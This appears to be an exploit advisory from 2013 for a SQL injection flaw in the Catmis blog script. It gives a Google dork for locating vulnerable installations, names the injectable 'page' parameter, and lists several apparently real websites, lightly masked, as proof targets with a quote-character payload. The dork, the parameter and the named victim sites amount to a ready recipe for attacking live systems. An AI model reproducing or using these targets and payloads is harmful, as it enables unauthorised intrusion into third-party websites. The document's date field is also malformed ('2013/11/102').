#********************************************************************************
# Exploit Title : Catmis Sql Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://code.google.com/p/catmis/
#
# Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
#
# Date: 2013/11/102
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
#
######################
# Proof:
#
# http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page='
#
# https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page='
#
# http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page='
#
# http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page='
#
# http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page='
#
######################
discovered by : ACC3SS
######################